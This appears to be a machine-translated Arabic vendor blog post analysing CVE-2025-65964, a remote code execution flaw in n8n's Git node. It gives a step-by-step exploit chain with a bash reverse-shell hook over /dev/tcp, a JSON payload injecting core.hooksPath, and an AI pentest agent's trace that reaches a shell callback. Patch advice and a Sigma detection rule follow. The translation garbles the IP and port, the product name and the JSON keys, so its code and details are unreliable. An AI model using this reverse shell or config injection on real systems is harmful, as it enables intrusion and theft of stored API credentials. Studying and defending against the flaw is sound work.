رأس القلم

cve-2025-65964: تسليح خطافات Git Hooks في n8n من أجل استنساخ هجمات الاحتيال الخبيثة في البنية التحتية للذكاء الاصطناعي

في مشهد أمن الذكاء الاصطناعي سريع التطور، غالباً ما يركز القطاع على الهجمات العدائية ضد النماذج اللغوية الكبيرة (مثل الحقن الفوري)، بينما يهمل "الهيكل العظمي" المتداعي الذي يجمع هذه العوامل معاً، وهو طبقة التنسيق.

في 8 ديسمبر 2025، كشف المجتمع الأمني عن CVE-2025-65964، ثغرة خطيرة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في ن8 نالأداة الأكثر شعبية في العالم لأتمتة سير العمل مفتوحة المصدر. مع درجة CVSS v4 من 9.4 (حرجة)فإن هذا الخلل ليس مجرد خطأ آخر في الويب. إنه يمثل إساءة استخدام معقدة لمنطق التكوين الأساسي لـ Git، حيث يتم تسليح عمليات التحكم في الإصدار المشروعة لتهديد الجهاز العصبي المركزي لمكدسات الذكاء الاصطناعي الحديثة.

تتجاوز هذه المقالة الاستشارات العامة. من وجهة نظر الفريق الأحمر المتشدد، سنقوم بتشريح سلسلة الاستغلالوالسبب الجذري، ولماذا هذا هو جوهر "هجوم سلسلة التوريد العميل".

السياق عندما يصبح Git هو الناقل

لقد أصبح n8n حجر الزاوية في تطبيقات الذكاء الاصطناعي الحديثة، ويُستخدم على نطاق واسع لربط الآلات ذاتية التشغيل (مثل GPT-5) وقواعد البيانات المتجهة (مثل Pinecone) وواجهات برمجة التطبيقات الداخلية. ولدعم CI/CD والتحكم في الإصدار لسير العمل، يأتي n8n مزودًا بـ عقدة Git Node.

جوهر CVE-2025-65964 يكمن في فشل عقدة n8n Git Nit Node في تعقيم مفاتيح التكوين أثناء addConfig العملية. يستفيد المهاجمون من هذا السهو لتجاوز مسار الخطافات الأساسية مما يؤدي فعليًا إلى اختطاف تدفق تنفيذ ثنائي Git.

cve-2025-65964: تسليح خطافات Git Hooks في n8n من أجل استنساخ هجمات الاحتيال الخبيثة في البنية التحتية للذكاء الاصطناعي

الفهم مسار الخطافات الأساسية

في بنية Git القياسية، الخطافات (البرامج النصية التي يتم تنفيذها على أحداث مثل الالتزام, تسجيل الخروج, الدمج) يتم تخزينها في مستودع .git/hooks الدليل. لأسباب أمنية، لا يقوم Git بنسخ هذه الخطافات عند استنساخ مستودع.

ومع ذلك، قدم Git 2.9 خيار تكوين core.hooksPath، والذي يسمح للمستخدمين بتحديد مسار مخصص للخطافات في أي مكان على نظام الملفات.

إذا تمكن أحد المهاجمين من التحكم بمفتاح التكوين هذا وتوجيهه إلى دليل لديه حق الوصول للكتابة إليه (على سبيل المثال، /tmp/ أو دليل تحميل الملفات)، في المرة التالية التي ينفذ فيها n8n أي عملية لـ Git، يخرج Git من صندوق الحماية الخاص به وينفذ البرنامج النصي للمهاجم.

سلسلة الاستغلال: درس في الثغرات المنطقية

يتطلب الاستغلال الناجح أكثر من مجرد حمولة واحدة؛ فهو يتطلب "تنسيقًا منطقيًا". فيما يلي إعادة إنتاج الهجوم خطوة بخطوة من مختبرنا البحثي.

المرحلة 1: الاستطلاع والوصول

يحصل المهاجم أولاً على إمكانية الوصول إلى محرر سير عمل n8n. في العديد من الشبكات الداخلية للشركات، يتم نشر n8n من قبل مهندسي الذكاء الاصطناعي وعلماء البيانات، وغالبًا ما يفتقرون إلى مصادقة صارمة أو يجلسون خلف بيانات اعتماد افتراضية ضعيفة.

تأكيد الهدف: 0.123.1 <= الإصدار n8n <1.119.2.

المرحلة 2: تنظيم الحمولة

منذ مسار الخطافات الأساسية إلى دليل، يجب على المهاجم أولًا أن يزرع نصًا برمجيًا قابلاً للتنفيذ باسم خطاف Git محدد (على سبيل المثال ما بعد الخروج) في موقع قابل للكتابة.

استخدام n8n's "كتابة ملف ثنائي" عقدة (أو عقدة "تنفيذ الأوامر" إذا لم تكن محصنة)، يقوم المهاجم بإسقاط برنامج نصي خبيث.

مثال على البرامج النصية الخبيثة (/tmp/pwn/pwn/post-checkout):

باش

'#!/bin/bash

حمولة قذيفة عكسية

يُنفذ بصمت بعد عملية خروج من Git

/bin/bash -i >& /dev/tcp/10.10.10.10.5/444444 0>&1'

المرحلة 3: حقن التكوين

هذه هي نقطة الزناد. يخلق المهاجم عقدة Git Node ويختار عملية "إضافة تهيئة". عادةً ما يقوم المستخدمون بتكوين اسم المستخدم أو مستخدم.البريد الإلكتروني. ومع ذلك، من خلال التلاعب بمعلمات JSON مباشرة، يقوم المهاجم بحقن المفتاح الخطير.

استغلال حمولة JSON Payload:

JSON

{"المعلمات": { "العملية": "addConfig", "configName": "core.hooksPath", "configValue": "/tmp/pwn"، "repositoryPath": "/home/node/.n8n/git/git/workflow_repo"}، "name": "Weaponized_Git_Config", "type": "n8n-nodes-base.git"، "typeVersion": 1، "الموضع": [460, 300] }

عند تنفيذ هذه العقدة، يتم تشغيل عملية n8n الأساسية:

تكوين git -ملف /home/node/.n8n/git/workflow_repo/.git/config core.hooksPath /tmp/pwn

المرحلة 4: الزناد

بمجرد تعيين التهيئة، فإنها تكون ثابتة. يقوم المهاجم ببساطة بإضافة عقدة Git Node أخرى إلى سير العمل لتنفيذ عملية حميدة، مثل git checkout master أو git status.

التسلسل: تبدأ عملية Git -> يقرأ مسار core.hooksPath -> تحميل /tmp/pwn/post-checkout -> تم تنفيذ RCE.

cve-2025-65964: تسليح خطافات Git Hooks في n8n من أجل استنساخ هجمات الاحتيال الخبيثة في البنية التحتية للذكاء الاصطناعي

لماذا يُعد هذا كابوس البنية التحتية للذكاء الاصطناعي؟

بالنسبة لمهندسي الأمن، فإن فهم التأثير أكثر أهمية من الخطأ نفسه. في عصر الذكاء الاصطناعي، فإن خادم n8n ليس مجرد خدمة ويب؛ إنه المدفن الرئيسي.

  1. تفريغ بيانات الاعتماد: تحتوي قاعدة بيانات n8n على مفاتيح واجهة برمجة التطبيقات المشفرة ل OpenAI و AWS Bedrock و Snowflake و Slack. يمكن للمهاجم، من خلال الوصول إلى shell، فك تشفير بيانات الاعتماد هذه (غالبًا ما توجد في ~/.n8n/database.sqlite)، مما يؤدي إلى اختراق كامل لبيئة السحابة المؤسسية.
  2. تسمم RAG: يمكن للمهاجمين اختطاف تدفقات العمل التي تكتب إلى قواعد بيانات Vector Databases. من خلال حقن مقتطفات معرفية خبيثة، يمكنهم التلاعب بمخرجات أنظمة RAG الداخلية للشركات، مما يسهل حملات الهندسة الاجتماعية العميقة أو حملات التضليل.
  3. مخاطر الهروب من الحاوية: يتم تشغيل العديد من عمليات نشر n8n بامتيازات مرتفعة (أو -ممتاز) للسماح لمكتبات Python مثل LangChain بالتفاعل مع النظام. في مثل هذه الحالات، يكون RCE داخل الحاوية مكافئًا وظيفيًا للجذر على المضيف.

دراسة حالة بينليجنت الوكيل ضد الوكيل

في Penligent.ai، نصنف هذا على أنه "عيب منطقي". تفشل ماسحات DAST التقليدية في اكتشاف CVE-2025-65964 بسبب:

  • لا تعرف الماسحات الضوئية كيفية "بناء سير العمل".
  • لا يمكن للماسحات الضوئية فهم المنطق الزمني لـ "كتابة الملف أولاً، وتكوين Git ثانياً."

ومع ذلك، يُظهر وكلاء اختبار الاختراق الآلي من Penligent قدرات تفكير تحاكي المهاجمين البشريين المتقدمين.

[التتبع الداخلي للعميل المتتبع - 2025-12-09 14:02:33]

ملاحظة: المنفذ الهدف 5678 مفتوح. تم تحديده على أنه n8n. تم تجاوز بيانات الاعتماد الضعيفة بنجاح.

المنطق: تم اكتشاف إمكانية Git Node المكتشفة. تشير قاعدة المعرفة إلى خطر حقن تكوين Git. تم حظر التنفيذ المباشر للأوامر. هل يمكنني تحقيق التنفيذ عبر البيئة أو التلاعب بالتكوين؟

خطة العمل:

  1. المحاولة تنفيذ الأمر للتحقق من الخروج (فشل، تم تعطيل العقدة).
  2. الاستراتيجية المحورية: البحث عن أوليات كتابة الملفات. كتابة ملف ثنائي العقدة متاحة.
  3. بناء سلسلة الاستغلال: اكتب قذيفة عكسية إلى /tmp/.git-hooks -> أدخل core.hooksPath عبر عقدة Git -> تشغيل سجل Git.Execution: تشغيل معرّف سير العمل pwn_test_01.result: تم استلام رد استدعاء الصدفة العكسي. تم التحقق من الثغرة.

هذا هو عرض القيمة الأساسية لـ بنليجنت: استخدام الذكاء الاصطناعي لمحاربة الذكاء الاصطناعي. لا يكتفي عملاؤنا بمطابقة بصمات الأصابع فحسب، بل يفهمون منطق العمل ويحاكون حرفة الخصم عالية المستوى داخل بيئة رقابية آمنة.

ن8 ن
CVE-2025-65964 PoC

الدفاع والكشف

المعالجة

  • التصحيح فوراً: ترقية n8n إلى الإصدار 1.119.2 أو أحدث. يطبّق الإصدار الجديد قائمة سماح صارمة لـ addConfig المفاتيح.
  • التصلب: استخدم N8N_NODES_EXCLUDE=["n8n-nodes-base.git"] متغير البيئة في إعداد Docker الخاص بك لتعطيل عقدة Git تمامًا إذا لم تكن مهمة حرجة.

اصطياد التهديدات

إذا كنت تشك في وجود انتهاك، فقم بمراجعة .git/config الملفات على خوادم n8n الخاصة بك.

مثال على قاعدة اكتشاف سيجما:

YAML

العنوان: تعديل مشبوه في تكوين Git عبر n8n الحالة: تجريبي مصدر السجلات: الفئة: عملية_إنشاء المنتج: لينكس الكشف: التحديد: الصورة الأصلية |النهايات مع: '/العقدة' صورة |ينتهي بـ: '/git' سطر الأوامر |يحتوي على: - 'config' - 'core.hooksPath' الشرط: مستوى التحديد: مرتفع

أي أمر Git يتم إنشاؤه بواسطة عملية Node.js يحاول تعديل مسار الخطافات الأساسية يجب التعامل معه كمؤشر عالي الدقة للتسوية (IoC).

الخاتمة

CVE-2025-65964 يثبت مرة أخرى أنه مع تحوّل تطوير البرمجيات نحو البنى "العميل الأصلي"، تتلاشى الحدود التقليدية. غالبًا ما تكون مرونة أدواتنا هي العدو الأكبر للأمان.

بالنسبة لمهندس الأمن المتشدد، تحولت ساحة المعركة من الواجهة الأمامية للويب إلى الواجهة الخلفية للتنسيق. لا تراقب فقط طلبات HTTP؛ راقب سير العمل الذي يعمل بصمت في الخلفية. راقب عمليات Git المؤتمتة. هذه هي الواجهة الأمامية لعام 2025.

إذا كان فريقك يفتقر إلى القوى العاملة اللازمة للتحقق يدويًا من مثل هذه المخاطر المنطقية المعقدة، فقد يكون الوقت قد حان لجلب بنليجنت-الفريق الأحمر الرقمي الذكي الذي يمسك بزمام الأمور في عصر الذكاء الاصطناعي.

الروابط الداخلية/المراجع:

شارك المنشور:
منشورات ذات صلة
arArabic